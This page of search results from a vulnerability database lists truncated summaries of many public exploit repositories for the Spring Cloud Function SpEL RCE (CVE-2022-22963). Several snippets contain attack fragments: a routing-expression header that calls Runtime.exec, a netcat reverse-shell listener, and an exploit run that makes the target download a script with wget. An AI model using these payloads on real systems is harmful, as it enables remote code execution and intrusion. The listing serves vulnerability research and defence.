Lucene search
+L

172 matches found

Kitploit
Kitploit
added 2026/09/22 4:24 p.m.14 views

CVE-2022-22963-Exploit

CVE-2022-22963 Exploit This repository contains a Rust-based exploit for the CVE-2022-22963 vulnerability found in Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions. The vulnerability allows remote code execution and access to local resources through a specially crafted...

9.8CVSS8.2AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/22 4:14 p.m.15 views

Spring-CVE

Spring CVE This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell". CVE-2022-22963 In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing...

9.8CVSS8.3AI score0.99938EPSS
SaveExploits137
Kitploit
Kitploit
added 2026/09/22 12:04 p.m.10 views

CVE-2022-22963-POC

CVE-2022-22963 Exploit Description In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local...

9.8CVSS8.1AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/22 11:22 a.m.32 views

spring-spel-0day-poc

spring-spel-0day-poc spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header root@kitploit: spring.cloud.function.routing-expression:Tjava.lang.Runtime.getRuntime.exec"open -a calculator.app" build root@kitploit: wget...

5.4AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/22 11:22 a.m.9 views

spring-spel-0day-poc

spring-spel-0day-poc POC y EXP de RCE para spring-cloud/spring-cloud-function https://github.com/spring-cloud/spring-cloud-function cabecera root@kitploit: spring.cloud.function.routing-expression:Tjava.lang.Runtime.getRuntime.exec"open -a calculator.app" compilación root@kitploit: wget...

5.8AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/22 11:16 a.m.9 views

CVE-2022-22963

CVE-2022-22963 - Spring4shell To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: root@kitploit: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: root@kitploit: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:808...

9.8CVSS8AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/22 11:03 a.m.11 views

CVE-2022-22963

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/SpelRCEPOC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable. Mo...

9.8CVSS7.8AI score0.99938EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/22 10:57 a.m.12 views

spring-cloud-function-rce

Spring Cloud Function SPEL Expression Injection Vulnerability CVE-2022-22963 Spring framework provides a comprehensive programming and configuration model for modern Java-based enterprise applications on any type of deployment platform. The serverless framework in Spring Cloud, the RoutingFunctio...

9.8CVSS8.3AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/22 8:36 a.m.10 views

SpringCloudFunction-Research

SpringCloudFunction-Research CVE-2022-22963 research Environment vulfocus/spring-cloud-function-rce:latest Cause Parsing issue of the spring.cloud.function.routing-expression parameter in the Request Header, leading to injection Payload attacks. Reference...

9.8CVSS7.8AI score0.99938EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/22 7:11 a.m.11 views

CVE-2022-22963

CVE-2022-22963 spring cloud function spel rce spring cloud function one-click exploitation tool! by charis Blog https://charis3306.top/ Packaged as an exe file, ready to use out of the box Command theme root@kitploit: usage: Spring-cloud-function-spel0.2.exe -h --check CHECK --route ROUTE --url U...

9.8CVSS8AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/22 5:58 a.m.10 views

cve-2022-22963

Spring Cloud Function SpEL - cve-2022-22963 Build root@kitploit: $ git clone https://github.com/twseptian/cve-2022-22963.git $ cd cve-2022-22963 $ docker build . -t spring-spel-0day $ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day Payload root@kitploit:...

9.8CVSS8AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/22 4:38 a.m.37 views

SpringExploitGUI

SpringExploitGUIv1.0 0x01 Preface Today, I reproduced several previous Spring vulnerabilities and weaponized them. The tool currently supports detection and exploitation of Spring Cloud Gateway RCE CVE-2022-22947, Spring Cloud Function SpEL RCE CVE-2022-22963, and Spring Framework RCE...

10CVSS7.8AI score0.98253EPSS
SaveExploits54
Kitploit
Kitploit
added 2026/09/22 12:27 a.m.9 views

CVE-2022-22963

CVE-2022-22963 Educational proof-of-concept automation for CVE-2022-22963, demonstrated in an authorized Hack The Box lab environment. Overview CVE-2022-22963 is a Spring Cloud Function vulnerability involving the spring.cloud.function.routing-expression header. Under vulnerable configurations, a...

9.8CVSS8AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/21 4:56 p.m.9 views

CVE-2022-22963

CVE-2022-22963 In versions 3.1.6, 3.2.2, and earlier versions of Spring Cloud Function, when using the routing functionality, it is possible for a user to provide a specially crafted SpEL as a routing expression that can result in remote code execution and access to local resources. PoC Clone the...

9.8CVSS8.2AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/20 6:39 p.m.10 views

CVE-2022-22963_Reverse-Shell-Exploit

CVE-2022-22963 Reverse Shell Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server. The exploit uses the vulnerable /functionRouter endpoint to execute a...

9.8CVSS8.7AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/20 11:34 a.m.12 views

Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE

Spring Cloud Function Vulnerability CVE-2022-22963 RCE This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function =3.1.6 for 3.1.x and =3.2.2 for 3.2.x Combination of multiple POCs online Author: Randall Banner Date: 17/04/23 Description: Scri...

9.8CVSS7.8AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/20 1:45 a.m.9 views

RCE-in-Spring-Cloud-CVE-2022-22963

Exploit for RCE in Spring Cloud CVE 2022-22963 Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function See for details about the vulnerability here and here PoC Run the netcat on your host: root@kitploit: $ nc -lvnp 9001 Run the exploit example with default port 9001 on...

9.8CVSS8.2AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/19 10:36 p.m.9 views

CVE-2022-22963

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/SpelRCEPOC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable...

9.8CVSS7.7AI score0.99938EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/19 8:58 a.m.17 views

CVE-2022-22963-PoC

CVE-2022-22963: Spring4Shell RCE Exploit This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function /tmp/rce $ python exploit.py 10.10.10.10:8080 'wget http://10.10.10.60/test.sh -O /tmp/test.sh' + Host is vulnerable + Command executed + Explo...

9.8CVSS7.9AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/17 6:05 p.m.8 views

CVE-2022-22963

CVE-2022-22963 Spring Cloud Function SpEL Expression Injection Remote Code Execution Vulnerability Detection and Exploitation Tool. Vulnerability Overview CVE-2022-22963 is a high-severity RCE vulnerability CVSS 9.8 in the routing functionality of Spring Cloud Function. When the application enabl...

9.8CVSS8.5AI score0.99938EPSS
SaveExploits37
Rows per page
Query Builder